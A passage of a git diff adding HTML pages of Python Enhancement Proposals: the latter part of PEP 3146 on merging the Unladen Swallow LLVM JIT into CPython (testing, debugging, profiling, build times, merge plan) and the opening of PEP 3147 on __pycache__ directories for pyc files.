  • Adding CPython 2.6 C API compatibility. Since Google still primarily uses +CPython 2.4 internally, we have needed to convert uses of int to +Py_ssize_t and similar API changes.
  • +
  • Fixing or disabling explicit, incorrect tests of the CPython version number.
  • +
  • Conditionally disabling code that worked around or depending on bugs in +CPython 2.4 that have since been fixed.
  • +
+

Testing against this wide range of public and proprietary applications and +libraries has been instrumental in ensuring the correctness of Unladen Swallow. +Testing has exposed bugs that we have duly corrected. Our automated regression +testing regime has given us high confidence in our changes as we have moved +forward.

+

In addition to third-party testing, we have added further tests to CPython’s +test suite for corner cases of the language or implementation that we felt were +untested or underspecified (for example, [48], +[49]). These have been especially important when implementing +optimizations, helping make sure we have not accidentally broken the darker +corners of Python.

+

We have also constructed a test suite focused solely on the LLVM-based JIT +compiler and the optimizations implemented for it [38]. Because of +the complexity and subtlety inherent in writing an optimizing compiler, we have +attempted to exhaustively enumerate the constructs, scenarios and corner cases +we are compiling and optimizing. The JIT tests also include tests for things +like the JIT hotness model, making it easier for future CPython developers to +maintain and improve.

+

We have recently begun using fuzz testing [39] to stress-test the +compiler. We have used both pyfuzz [40] and Fusil [41] in the past, +and we recommend they be introduced as an automated part of the CPython testing +process.

+
+

Known Incompatibilities

+

The only application or library we know to not work with Unladen Swallow that +does work with CPython 2.6.4 is Psyco [65]. We are aware of some libraries +such as PyGame [79] that work well with CPython 2.6.4, but suffer some +degradation due to changes made in Unladen Swallow. We are tracking this issue +[47] and are working to resolve these instances of +degradation.

+

While Unladen Swallow is source-compatible with CPython 2.6.4, it is not +binary compatible. C extension modules compiled against one will need to be +recompiled to work with the other.

+

The merger of Unladen Swallow should have minimal impact on long-lived +CPython optimization branches like WPython. WPython [105] and Unladen +Swallow are largely orthogonal, and there is no technical reason why both +could not be merged into CPython. The changes needed to make WPython +compatible with a JIT-enhanced version of CPython should be minimal +[114]. The same should be true for other CPython optimization +projects (for example, [115]).

+

Invasive forks of CPython such as Stackless Python [116] are more +challenging to support. Since Stackless is highly unlikely to be merged into +CPython [117] and an increased maintenance burden is part and +parcel of any fork, we consider compatibility with Stackless to be relatively +low-priority. JIT-compiled stack frames use the C stack, so Stackless should +be able to treat them the same as it treats calls through extension modules. +If that turns out to be unacceptable, Stackless could either remove the JIT +compiler or improve JIT code generation to better support heap-based stack +frames [118], [119].

+
+
+
+

Platform Support

+

Unladen Swallow is inherently limited by the platform support provided by LLVM, +especially LLVM’s JIT compilation system [7]. LLVM’s JIT has the +best support on x86 and x86-64 systems, and these are the platforms where +Unladen Swallow has received the most testing. We are confident in LLVM/Unladen +Swallow’s support for x86 and x86-64 hardware. PPC and ARM support exists, but +is not widely used and may be buggy (for example, [100], +[84], [101]).

+

Unladen Swallow is known to work on the following operating systems: Linux, +Darwin, Windows. Unladen Swallow has received the most testing on Linux and +Darwin, though it still builds and passes its tests on Windows.

+

In order to support hardware and software platforms where LLVM’s JIT does not +work, Unladen Swallow provides a ./configure --without-llvm option. This +flag carves out any part of Unladen Swallow that depends on LLVM, yielding a +Python binary that works and passes its tests, but has no performance +advantages. This configuration is recommended for hardware unsupported by LLVM, +or systems that care more about memory usage than performance.

+
+
+

Impact on CPython Development

+
+

Experimenting with Changes to Python or CPython Bytecode

+

Unladen Swallow’s JIT compiler operates on CPython bytecode, and as such, it is +immune to Python language changes that affect only the parser.

+

We recommend that changes to the CPython bytecode compiler or the semantics of +individual bytecodes be prototyped in the interpreter loop first, then be ported +to the JIT compiler once the semantics are clear. To make this easier, Unladen +Swallow includes a --without-llvm configure-time option that strips out the +JIT compiler and all associated infrastructure. This leaves the current burden +of experimentation unchanged so that developers can prototype in the current +low-barrier-to-entry interpreter loop.

+

Unladen Swallow began implementing its JIT compiler by doing straightforward, +naive translations from bytecode implementations into LLVM API calls. We found +this process to be easily understood, and we recommend the same approach for +CPython. We include several sample changes from the Unladen Swallow repository +here as examples of this style of development: [26], [27], +[28], [29].

+
+
+

Debugging

+

The Unladen Swallow team implemented changes to gdb to make it easier to use gdb +to debug JIT-compiled Python code. These changes were released in gdb 7.0 +[17]. They make it possible for gdb to identify and unwind past +JIT-generated call stack frames. This allows gdb to continue to function as +before for CPython development if one is changing, for example, the list +type or builtin functions.

+

Example backtrace after our changes, where baz, bar and foo are +JIT-compiled:

+
Program received signal SIGSEGV, Segmentation fault.
+0x00002aaaabe7d1a8 in baz ()
+(gdb) bt
+#0 0x00002aaaabe7d1a8 in baz ()
+#1 0x00002aaaabe7d12c in bar ()
+#2 0x00002aaaabe7d0aa in foo ()
+#3 0x00002aaaabe7d02c in main ()
+#4 0x0000000000b870a2 in llvm::JIT::runFunction (this=0x1405b70, F=0x14024e0, ArgValues=...)
+at /home/rnk/llvm-gdb/lib/ExecutionEngine/JIT/JIT.cpp:395
+#5 0x0000000000baa4c5 in llvm::ExecutionEngine::runFunctionAsMain
+(this=0x1405b70, Fn=0x14024e0, argv=..., envp=0x7fffffffe3c0)
+at /home/rnk/llvm-gdb/lib/ExecutionEngine/ExecutionEngine.cpp:377
+#6 0x00000000007ebd52 in main (argc=2, argv=0x7fffffffe3a8,
+envp=0x7fffffffe3c0) at /home/rnk/llvm-gdb/tools/lli/lli.cpp:208
+
+
+

Previously, the JIT-compiled frames would have caused gdb to unwind incorrectly, +generating lots of obviously-incorrect #6 0x00002aaaabe7d0aa in ?? ()-style +stack frames.

+

Highlights:

+
    +
  • gdb 7.0 is able to correctly parse JIT-compiled stack frames, allowing full +use of gdb on non-JIT-compiled functions, that is, the vast majority of the +CPython codebase.
  • +
  • Disassembling inside a JIT-compiled stack frame automatically prints the full +list of instructions making up that function. This is an advance over the +state of gdb before our work: developers needed to guess the starting address +of the function and manually disassemble the assembly code.
  • +
  • Flexible underlying mechanism allows CPython to add more and more information, +and eventually reach parity with C/C++ support in gdb for JIT-compiled machine +code.
  • +
+

Lowlights:

+
    +
  • gdb cannot print local variables or tell you what line you’re currently +executing inside a JIT-compiled function. Nor can it step through +JIT-compiled code, except for one instruction at a time.
  • +
  • Not yet integrated with Apple’s gdb or Microsoft’s Visual Studio debuggers.
  • +
+

The Unladen Swallow team is working with Apple to get these changes +incorporated into their future gdb releases.

+
+
+

Profiling

+

Unladen Swallow integrates with oProfile 0.9.4 and newer [18] to support +assembly-level profiling on Linux systems. This means that oProfile will +correctly symbolize JIT-compiled functions in its reports.

+

Example report, where the #u#-prefixed symbol names are JIT-compiled Python +functions:

+
$ opreport -l ./python | less
+CPU: Core 2, speed 1600 MHz (estimated)
+Counted CPU_CLK_UNHALTED events (Clock cycles when not halted) with a unit mask of 0x00 (Unhalted core cycles) count 100000
+samples % image name symbol name
+79589 4.2329 python PyString_FromFormatV
+62971 3.3491 python PyEval_EvalCodeEx
+62713 3.3354 python tupledealloc
+57071 3.0353 python _PyEval_CallFunction
+50009 2.6597 24532.jo #u#force_unicode
+47468 2.5246 python PyUnicodeUCS2_Decode
+45829 2.4374 python PyFrame_New
+45173 2.4025 python lookdict_string
+43082 2.2913 python PyType_IsSubtype
+39763 2.1148 24532.jo #u#render5
+38145 2.0287 python _PyType_Lookup
+37643 2.0020 python PyObject_GC_UnTrack
+37105 1.9734 python frame_dealloc
+36849 1.9598 python PyEval_EvalFrame
+35630 1.8950 24532.jo #u#resolve
+33313 1.7717 python PyObject_IsInstance
+33208 1.7662 python PyDict_GetItem
+33168 1.7640 python PyTuple_New
+30458 1.6199 python PyCFunction_NewEx
+
+
+

This support is functional, but as-yet unpolished. Unladen Swallow maintains a +punchlist of items we feel are important to improve in our oProfile integration +to make it more useful to core CPython developers [19].

+

Highlights:

+
    +
  • Symbolization of JITted frames working in oProfile on Linux.
  • +
+

Lowlights:

+
    +
  • No work yet invested in improving symbolization of JIT-compiled frames for +Apple’s Shark [20] or Microsoft’s Visual Studio profiling tools.
  • +
  • Some polishing still desired for oProfile output.
  • +
+

We recommend using oProfile 0.9.5 (and newer) to work around a now-fixed bug on +x86-64 platforms in oProfile. oProfile 0.9.4 will work fine on 32-bit platforms, +however.

+

Given the ease of integrating oProfile with LLVM [21] and +Unladen Swallow [22], other profiling tools should be easy as +well, provided they support a similar JIT interface [23].

+

We have documented the process for using oProfile to profile Unladen Swallow +[24]. This document will be merged into CPython’s Doc/ +tree in the merge.

+
+
+

Addition of C++ to CPython

+

In order to use LLVM, Unladen Swallow has introduced C++ into the core CPython +tree and build process. This is an unavoidable part of depending on LLVM; though +LLVM offers a C API [8], it is limited and does not expose the +functionality needed by CPython. Because of this, we have implemented the +internal details of the Unladen Swallow JIT and its supporting infrastructure +in C++. We do not propose converting the entire CPython codebase to C++.

+

Highlights:

+
    +
  • Easy use of LLVM’s full, powerful code generation and related APIs.
  • +
  • Convenient, abstract data structures simplify code.
  • +
  • C++ is limited to relatively small corners of the CPython codebase.
  • +
  • C++ can be disabled via ./configure --without-llvm, which even omits the +dependency on libstdc++.
  • +
+

Lowlights:

+
    +
  • Developers must know two related languages, C and C++ to work on the full +range of CPython’s internals.
  • +
  • A C++ style guide will need to be developed and enforced. PEP 7 will be +extended [120] to encompass C++ by taking the relevant parts of +the C++ style guides from Unladen Swallow [70], LLVM +[71] and Google [72].
  • +
  • Different C++ compilers emit different ABIs; this can cause problems if +CPython is compiled with one C++ compiler and extensions modules are compiled +with a different C++ compiler.
  • +
+
+
+

Managing LLVM Releases, C++ API Changes

+

LLVM is released regularly every six months. This means that LLVM may be +released two or three times during the course of development of a CPython 3.x +release. Each LLVM release brings newer and more powerful optimizations, +improved platform support and more sophisticated code generation.

+

LLVM releases usually include incompatible changes to the LLVM C++ API; the +release notes for LLVM 2.6 [9] include a list of +intentionally-introduced incompatibilities. Unladen Swallow has tracked LLVM +trunk closely over the course of development. Our experience has been +that LLVM API changes are obvious and easily or mechanically remedied. We +include two such changes from the Unladen Swallow tree as references here: +[10], [11].

+

Due to API incompatibilities, we recommend that an LLVM-based CPython target +compatibility with a single version of LLVM at a time. This will lower the +overhead on the core development team. Pegging to an LLVM version should not be +a problem from a packaging perspective, because pre-built LLVM packages +generally become available via standard system package managers fairly quickly +following an LLVM release, and failing that, llvm.org itself includes binary +releases.

+

Unladen Swallow has historically included a copy of the LLVM and Clang source +trees in the Unladen Swallow tree; this was done to allow us to closely track +LLVM trunk as we made patches to it. We do not recommend this model of +development for CPython. CPython releases should be based on official LLVM +releases. Pre-built LLVM packages are available from MacPorts [12] +for Darwin, and from most major Linux distributions ([13], +[14], [16]). LLVM itself provides additional binaries, +such as for MinGW [25].

+

LLVM is currently intended to be statically linked; this means that binary +releases of CPython will include the relevant parts (not all!) of LLVM. This +will increase the binary size, as noted above. To simplify downstream package +management, we will modify LLVM to better support shared linking. This issue +will block final merger [98].

+

Unladen Swallow has tasked a full-time engineer with fixing any remaining +critical issues in LLVM before LLVM’s 2.7 release. We consider it essential that +CPython 3.x be able to depend on a released version of LLVM, rather than closely +tracking LLVM trunk as Unladen Swallow has done. We believe we will finish this +work [99] before the release of LLVM 2.7, expected in May 2010.

+
+
+

Building CPython

+

In addition to a runtime dependency on LLVM, Unladen Swallow includes a +build-time dependency on Clang [5], an LLVM-based C/C++ compiler. We use +this to compile parts of the C-language Python runtime to LLVM’s intermediate +representation; this allows us to perform cross-language inlining, yielding +increased performance. Clang is not required to run Unladen Swallow. Clang +binary packages are available from most major Linux distributions (for example, +[15]).

+

We examined the impact of Unladen Swallow on the time needed to build Python, +including configure, full builds and incremental builds after touching a single +C source file.

+ + + + + + + + + + + + + + + + + + + + + + + + + +
./configureCPython 2.6.4CPython 3.1.1Unladen Swallow r988
Run 10m20.795s0m16.558s0m15.477s
Run 20m15.255s0m16.349s0m15.391s
Run 30m15.228s0m16.299s0m15.528s
+ + + + + + + + + + + + + + + + + + + + + + + + + +
Full makeCPython 2.6.4CPython 3.1.1Unladen Swallow r988
Run 11m30.776s1m22.367s1m54.053s
Run 21m21.374s1m22.064s1m49.448s
Run 31m22.047s1m23.645s1m49.305s
+

Full builds take a hit due to a) additional .cc files needed for LLVM +interaction, b) statically linking LLVM into libpython, c) compiling parts +of the Python runtime to LLVM IR to enable cross-language inlining.

+

Incremental builds are also somewhat slower than mainline CPython. The table +below shows incremental rebuild times after touching Objects/listobject.c.

+ + + + + + + + + + + + + + + + + + + + + + + + + +
Incr makeCPython 2.6.4CPython 3.1.1Unladen Swallow r1024
Run 10m1.854s0m1.456s0m6.680s
Run 20m1.437s0m1.442s0m5.310s
Run 30m1.440s0m1.425s0m7.639s
+

As with full builds, this extra time comes from statically linking LLVM +into libpython. If libpython were linked shared against LLVM, this +overhead would go down.

+
+
+
+

Proposed Merge Plan

+

We propose focusing our efforts on eventual merger with CPython’s 3.x line of +development. The BDFL has indicated that 2.7 is to be the final release of +CPython’s 2.x line of development [30], and since 2.7 alpha 1 has +already been released, we have missed the window. Python 3 is the +future, and that is where we will target our performance efforts.

+

We recommend the following plan for merger of Unladen Swallow into the CPython +source tree:

+
    +
  • Creation of a branch in the CPython SVN repository to work in, call it +py3k-jit as a strawman. This will be a branch of the CPython py3k +branch.
  • +
  • We will keep this branch closely integrated to py3k. The further we +deviate, the harder our work will be.
  • +
  • Any JIT-related patches will go into the py3k-jit branch.
  • +
  • Non-JIT-related patches will go into the py3k branch (once reviewed and +approved) and be merged back into the py3k-jit branch.
  • +
  • Potentially-contentious issues, such as the introduction of new command line +flags or environment variables, will be discussed on python-dev.
  • +
+

Because Google uses CPython 2.x internally, Unladen Swallow is based on CPython +2.6. We would need to port our compiler to Python 3; this would be done as +patches are applied to the py3k-jit branch, so that the branch remains a +consistent implementation of Python 3 at all times.

+

We believe this approach will be minimally disruptive to the 3.2 or 3.3 release +process while we iron out any remaining issues blocking final merger into +py3k. Unladen Swallow maintains a punchlist of known issues needed before +final merger [31], which includes all problems mentioned in this +PEP; we trust the CPython community will have its own concerns. This punchlist +is not static; other issues may emerge in the future that will block final +merger into the py3k branch.

+

Changes will be committed directly to the py3k-jit branch, with only large, +tricky or controversial changes sent for pre-commit code review.

+
+

Contingency Plans

+

There is a chance that we will not be able to reduce memory usage or startup +time to a level satisfactory to the CPython community. Our primary contingency +plan for this situation is to shift from an online just-in-time compilation +strategy to an offline ahead-of-time strategy using an instrumented CPython +interpreter loop to obtain feedback. This is the same model used by gcc’s +feedback-directed optimizations (-fprofile-generate) [112] and +Microsoft Visual Studio’s profile-guided optimizations [113]; we will +refer to this as “feedback-directed optimization” here, or FDO.

+

We believe that an FDO compiler for Python would be inferior to a JIT compiler. +FDO requires a high-quality, representative benchmark suite, which is a relative +rarity in both open- and closed-source development. A JIT compiler can +dynamically find and optimize the hot spots in any application – benchmark +suite or no – allowing it to adapt to changes in application bottlenecks +without human intervention.

+

If an ahead-of-time FDO compiler is required, it should be able to leverage a +large percentage of the code and infrastructure already developed for Unladen +Swallow’s JIT compiler. Indeed, these two compilation strategies could exist +side by side.

+
+
+
+

Future Work

+

A JIT compiler is an extremely flexible tool, and we have by no means exhausted +its full potential. Unladen Swallow maintains a list of yet-to-be-implemented +performance optimizations [50] that the team has not yet +had time to fully implement. Examples:

+
    +
  • Python/Python inlining [67]. Our compiler currently performs no +inlining between pure-Python functions. Work on this is on-going +[69].
  • +
  • Unboxing [68]. Unboxing is critical for numerical performance. PyPy +in particular has demonstrated the value of unboxing to heavily numeric +workloads.
  • +
  • Recompilation, adaptation. Unladen Swallow currently only compiles a Python +function once, based on its usage pattern up to that point. If the usage +pattern changes, limitations in LLVM [73] prevent us from +recompiling the function to better serve the new usage pattern.
  • +
  • JIT-compile regular expressions. Modern JavaScript engines reuse their JIT +compilation infrastructure to boost regex performance [74]. +Unladen Swallow has developed benchmarks for Python regular expression +performance ([75], [76], [77]), but +work on regex performance is still at an early stage [78].
  • +
  • Trace compilation [92], [93]. +Based on the results of PyPy and Tracemonkey [94], we believe that +a CPython JIT should incorporate trace compilation to some degree. We +initially avoided a purely-tracing JIT compiler in favor of a simpler, +function-at-a-time compiler. However this function-at-a-time compiler has laid +the groundwork for a future tracing compiler implemented in the same terms.
  • +
  • Profile generation/reuse. The runtime data gathered by the JIT could be +persisted to disk and reused by subsequent JIT compilations, or by external +tools such as Cython [102] or a feedback-enhanced code coverage tool.
  • +
+

This list is by no means exhaustive. There is a vast literature on optimizations +for dynamic languages that could and should be implemented in terms of Unladen +Swallow’s LLVM-based JIT compiler [54].

+
+
+

Unladen Swallow Community

+

We would like to thank the community of developers who have contributed to +Unladen Swallow, in particular: James Abbatiello, Joerg Blank, Eric Christopher, +Alex Gaynor, Chris Lattner, Nick Lewycky, Evan Phoenix and Thomas Wouters.

+
+
+

Licensing

+

All work on Unladen Swallow is licensed to the Python Software Foundation (PSF) +under the terms of the Python Software Foundation License v2 [56] under +the umbrella of Google’s blanket Contributor License Agreement with the PSF.

+

LLVM is licensed [57] under the University of llinois/NCSA Open Source +License [58], a liberal, OSI-approved license. The University of Illinois +Urbana-Champaign is the sole copyright holder for LLVM.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3146.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3147/index.html b/pep-3147/index.html new file mode 100644 index 00000000000..618d91540ff --- /dev/null +++ b/pep-3147/index.html @@ -0,0 +1,763 @@ + + + + + + + + PEP 3147 – PYC Repository Directories | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3147 – PYC Repository Directories

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Dec-2009
+
Python-Version:
+
3.2
+
Post-History:
+
30-Jan-2010, 25-Feb-2010, 03-Mar-2010, 12-Apr-2010
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes an extension to Python’s import mechanism which +improves sharing of Python source code files among multiple installed +different versions of the Python interpreter. It does this by +allowing more than one byte compilation file (.pyc files) to be +co-located with the Python source file (.py file). The extension +described here can also be used to support different Python +compilation caches, such as JIT output that may be produced by an +Unladen Swallow (PEP 3146) enabled C Python.

+
+
+

Background

+

CPython compiles its source code into “byte code”, and for performance +reasons, it caches this byte code on the file system whenever the +source file has changes. This makes loading of Python modules much +faster because the compilation phase can be bypassed. When your +source file is foo.py, CPython caches the byte code in a foo.pyc +file right next to the source.

+

Byte code files contain two 32-bit big-endian numbers followed by the +marshaled [2] code object. The 32-bit numbers represent a magic +number and a timestamp. The magic number changes whenever Python +changes the byte code format, e.g. by adding new byte codes to its +virtual machine. This ensures that pyc files built for previous +versions of the VM won’t cause problems. The timestamp is used to +make sure that the pyc file match the py file that was used to create +it. When either the magic number or timestamp do not match, the py +file is recompiled and a new pyc file is written.

+

In practice, it is well known that pyc files are not compatible across +Python major releases. A reading of import.c [3] in the Python +source code proves that within recent memory, every new CPython major +release has bumped the pyc magic number.

+
+
+

Rationale

+

Linux distributions such as Ubuntu [4] and Debian [5] provide more +than one Python version at the same time to their users. For example, +Ubuntu 9.10 Karmic Koala users can install Python 2.5, 2.6, and 3.1, +with Python 2.6 being the default.

+

This causes a conflict for third party Python source files installed +by the system, because you cannot compile a single Python source file +for more than one Python version at a time. When Python finds a pyc +file with a non-matching magic number, it falls back to the slower +process of recompiling the source. Thus if your system installed a +/usr/share/python/foo.py, two different versions of Python would +fight over the pyc file and rewrite it each time the source is +compiled. (The standard library is unaffected by this, since multiple +versions of the stdlib are installed on such distributions..)

+

Furthermore, in order to ease the burden on operating system packagers +for these distributions, the distribution packages do not contain +Python version numbers [6]; they are shared across all Python +versions installed on the system. Putting Python version numbers in +the packages would be a maintenance nightmare, since all the packages +- and their dependencies - would have to be updated every time a new +Python release was added or removed from the distribution. Because of +the sheer number of packages available, this amount of work is +infeasible.

+

(PEP 384 has been proposed to address binary compatibility issues +of third party extension modules across different versions of Python.)

+

Because these distributions cannot share pyc files, elaborate +mechanisms have been developed to put the resulting pyc files in +non-shared locations while the source code is still shared. Examples +include the symlink-based Debian regimes python-support [8] and +python-central [9]. These approaches make for much more complicated, +fragile, inscrutable, and fragmented policies for delivering Python +applications to a wide range of users. Arguably more users get Python +from their operating system vendor than from upstream tarballs. Thus, +solving this pyc sharing problem for CPython is a high priority for +such vendors.

+

This PEP proposes a solution to this problem.

+
+
+

Proposal

+

Python’s import machinery is extended to write and search for byte +code cache files in a single directory inside every Python package +directory. This directory will be called __pycache__.

+

Further, pyc file names will contain a magic string (called a “tag”) +that differentiates the Python version they were compiled for. This +allows multiple byte compiled cache files to co-exist for a single +Python source file.

+

The magic tag is implementation defined, but should contain the +implementation name and a version number shorthand, e.g. cpython-32. +It must be unique among all versions of Python, and whenever the magic +number is bumped, a new magic tag must be defined. An example pyc +file for Python 3.2 is thus foo.cpython-32.pyc.

+

The magic tag is available in the imp module via the get_tag() +function. This is parallel to the imp.get_magic() function.

+

This scheme has the added benefit of reducing the clutter in a Python +package directory.

+

When a Python source file is imported for the first time, a +__pycache__ directory will be created in the package directory, if +one does not already exist. The pyc file for the imported source will +be written to the __pycache__ directory, using the magic-tag +formatted name. If either the creation of the __pycache__ directory +or the pyc file inside that fails, the import will still succeed, just +as it does in a pre-PEP 3147 world.

+

If the py source file is missing, the pyc file inside __pycache__ +will be ignored. This eliminates the problem of accidental stale pyc +file imports.

+

For backward compatibility, Python will still support pyc-only +distributions, however it will only do so when the pyc file lives in +the directory where the py file would have been, i.e. not in the +__pycache__ directory. pyc file outside of __pycache__ will only +be imported if the py source file is missing.

+

Tools such as py_compile [15] and compileall [16] will be +extended to create PEP 3147 formatted layouts automatically, but will +have an option to create pyc-only distribution layouts.

+
+

Examples

+

What would this look like in practice?

+

Let’s say we have a Python package named alpha which contains a +sub-package name beta. The source directory layout before byte +compilation might look like this:

+
alpha/
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __init__.py
+        three.py
+        four.py
+
+
+

After byte compiling this package with Python 3.2, you would see the +following layout:

+
alpha/
+    __pycache__/
+        __init__.cpython-32.pyc
+        one.cpython-32.pyc
+        two.cpython-32.pyc
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __pycache__/
+            __init__.cpython-32.pyc
+            three.cpython-32.pyc
+            four.cpython-32.pyc
+        __init__.py
+        three.py
+        four.py
+
+
+

Note: listing order may differ depending on the platform.

+

Let’s say that two new versions of Python are installed, one is Python +3.3 and another is Unladen Swallow. After byte compilation, the file +system would look like this:

+
alpha/
+    __pycache__/
+        __init__.cpython-32.pyc
+        __init__.cpython-33.pyc
+        __init__.unladen-10.pyc
+        one.cpython-32.pyc
+        one.cpython-33.pyc
+        one.unladen-10.pyc
+        two.cpython-32.pyc
+        two.cpython-33.pyc
+        two.unladen-10.pyc
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __pycache__/
+            __init__.cpython-32.pyc
+            __init__.cpython-33.pyc
+            __init__.unladen-10.pyc
+            three.cpython-32.pyc
+            three.cpython-33.pyc
+            three.unladen-10.pyc
+            four.cpython-32.pyc
+            four.cpython-33.pyc
+            four.unladen-10.pyc
+        __init__.py
+        three.py
+        four.py
+
+
+

As you can see, as long as the Python version identifier string is +unique, any number of pyc files can co-exist. These identifier +strings are described in more detail below.

+

A nice property of this layout is that the __pycache__ directories +can generally be ignored, such that a normal directory listing would +show something like this:

+
alpha/
+    __pycache__/
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __pycache__/
+        __init__.py
+        three.py
+        four.py
+
+
+

This is much less cluttered than even today’s Python.

+
+
+
+

Python behavior

+

When Python searches for a module to import (say foo), it may find +one of several situations. As per current Python rules, the term +“matching pyc” means that the magic number matches the current +interpreter’s magic number, and the source file’s timestamp matches +the timestamp in the pyc file exactly.

+
+

Case 0: The steady state

+

When Python is asked to import module foo, it searches for a +foo.py file (or foo package, but that’s not important for this +discussion) along its sys.path. If found, Python looks to see if +there is a matching __pycache__/foo.<magic>.pyc file, and if so, +that pyc file is loaded.

+
+
+

Case 1: The first import

+

When Python locates the foo.py, if the __pycache__/foo.<magic>.pyc +file is missing, Python will create it, also creating the +__pycache__ directory if necessary. Python will parse and byte +compile the foo.py file and save the byte code in +__pycache__/foo.<magic>.pyc.

+
+
+

Case 2: The second import

+

When Python is asked to import module foo a second time (in a +different process of course), it will again search for the foo.py +file along its sys.path. When Python locates the foo.py file, it +looks for a matching __pycache__/foo.<magic>.pyc and finding this, +it reads the byte code and continues as usual.

+
+
+

Case 3: __pycache__/foo.<magic>.pyc with no source

+

It’s possible that the foo.py file somehow got removed, while +leaving the cached pyc file still on the file system. If the +__pycache__/foo.<magic>.pyc file exists, but the foo.py file used +to create it does not, Python will raise an ImportError when asked +to import foo. In other words, Python will not import a pyc file from +the cache directory unless the source file exists.

+
+
+

Case 4: legacy pyc files and source-less imports

+

Python will ignore all legacy pyc files when a source file exists next +to it. In other words, if a foo.pyc file exists next to the +foo.py file, the pyc file will be ignored in all cases

+

In order to continue to support source-less distributions though, if +the source file is missing, Python will import a lone pyc file if it +lives where the source file would have been.

+
+
+

Case 5: read-only file systems

+

When the source lives on a read-only file system, or the __pycache__ +directory or pyc file cannot otherwise be written, all the same rules +apply. This is also the case when __pycache__ happens to be written +with permissions which do not allow for writing containing pyc files.

+
+
+
+

Flow chart

+

Here is a flow chart describing how modules are loaded:

+../_images/pep-3147-1.png + +
+
+

Alternative Python implementations

+

Alternative Python implementations such as Jython [11], IronPython +[12], PyPy [13], Pynie [14], and Unladen Swallow can also use the +__pycache__ directory to store whatever compilation artifacts make +sense for their platforms. For example, Jython could store the class +file for the module in __pycache__/foo.jython-32.class.

+
+
+

Implementation strategy

+

This feature is targeted for Python 3.2, solving the problem for those +and all future versions. It may be back-ported to Python 2.7. +Vendors are free to backport the changes to earlier distributions as +they see fit. For backports of this feature to Python 2, when the +-U flag is used, a file such as foo.cpython-27u.pyc can be +written.

+
+
+

Effects on existing code

+

Adoption of this PEP will affect existing code and idioms, both inside +Python and outside. This section enumerates some of these effects.

+
+

Detecting PEP 3147 availability

+

The easiest way to detect whether your version of Python provides PEP +3147 functionality is to do the following check:

+
>>> import imp
+>>> has3147 = hasattr(imp, 'get_tag')
+
+
+
+
+

__file__

+

In Python 3, when you import a module, its __file__ attribute points +to its source py file (in Python 2, it points to the pyc file). A +package’s __file__ points to the py file for its __init__.py. +E.g.:

+
>>> import foo
+>>> foo.__file__
+'foo.py'
+# baz is a package
+>>> import baz
+>>> baz.__file__
+'baz/__init__.py'
+
+
+

Nothing in this PEP would change the semantics of __file__.

+

This PEP proposes the addition of an __cached__ attribute to +modules, which will always point to the actual pyc file that was +read or written. When the environment variable +$PYTHONDONTWRITEBYTECODE is set, or the -B option is given, or if +the source lives on a read-only filesystem, then the __cached__ +attribute will point to the location that the pyc file would have +been written to if it didn’t exist. This location of course includes +the __pycache__ subdirectory in its path.

+

For alternative Python implementations which do not support pyc +files, the __cached__ attribute may point to whatever information +makes sense. E.g. on Jython, this might be the .class file for the +module: __pycache__/foo.jython-32.class. Some implementations may +use multiple compiled files to create the module, in which case +__cached__ may be a tuple. The exact contents of __cached__ are +Python implementation specific.

+

It is recommended that when nothing sensible can be calculated, +implementations should set the __cached__ attribute to None.

+
+
+

py_compile and compileall

+

Python comes with two modules, py_compile [15] and compileall +[16] which support compiling Python modules external to the built-in +import machinery. py_compile in particular has intimate knowledge +of byte compilation, so these will be updated to understand the new +layout. The -b flag is added to compileall for writing legacy +.pyc byte-compiled file path names.

+
+
+

bdist_wininst and the Windows installer

+

These tools also compile modules explicitly on installation. If they +do not use py_compile and compileall, then they would also have to +be modified to understand the new layout.

+
+
+

File extension checks

+

There exists some code which checks for files ending in .pyc and +simply chops off the last character to find the matching .py file. +This code will obviously fail once this PEP is implemented.

+

To support this use case, we’ll add two new methods to the imp +package [17]:

+
    +
  • imp.cache_from_source(py_path) -> pyc_path
  • +
  • imp.source_from_cache(pyc_path) -> py_path
  • +
+

Alternative implementations are free to override these functions to +return reasonable values based on their own support for this PEP. +These methods are allowed to return None when the implementation (or +PEP 302 loader in effect) for whatever reason cannot calculate +the appropriate file name. They should not raise exceptions.

+
+
+

Backports

+

For versions of Python earlier than 3.2 (and possibly 2.7), it is +possible to backport this PEP. However, in Python 3.2 (and possibly +2.7), this behavior will be turned on by default, and in fact, it will +replace the old behavior. Backports will need to support the old +layout by default. We suggest supporting PEP 3147 through the use of +an environment variable called $PYTHONENABLECACHEDIR or the command +line switch -Xenablecachedir to enable the feature.

+
+
+

Makefiles and other dependency tools

+

Makefiles and other tools which calculate dependencies on .pyc files +(e.g. to byte-compile the source if the .pyc is missing) will have +to be updated to check the new paths.

+
+
+
+

Alternatives

+

This section describes some alternative approaches or details that +were considered and rejected during the PEP’s development.

+
+

Hexadecimal magic tags

+

pyc files inside of the __pycache__ directories contain a magic tag +in their file names. These are mnemonic tags for the actual magic +numbers used by the importer. We could have used the hexadecimal +representation [10] of the binary magic number as a unique +identifier. For example, in Python 3.2:

+
>>> from binascii import hexlify
+>>> from imp import get_magic
+>>> 'foo.{}.pyc'.format(hexlify(get_magic()).decode('ascii'))
+'foo.580c0d0a.pyc'
+
+
+

This isn’t particularly human friendly though, thus the magic tag +proposed in this PEP.

+
+
+

PEP 304

+

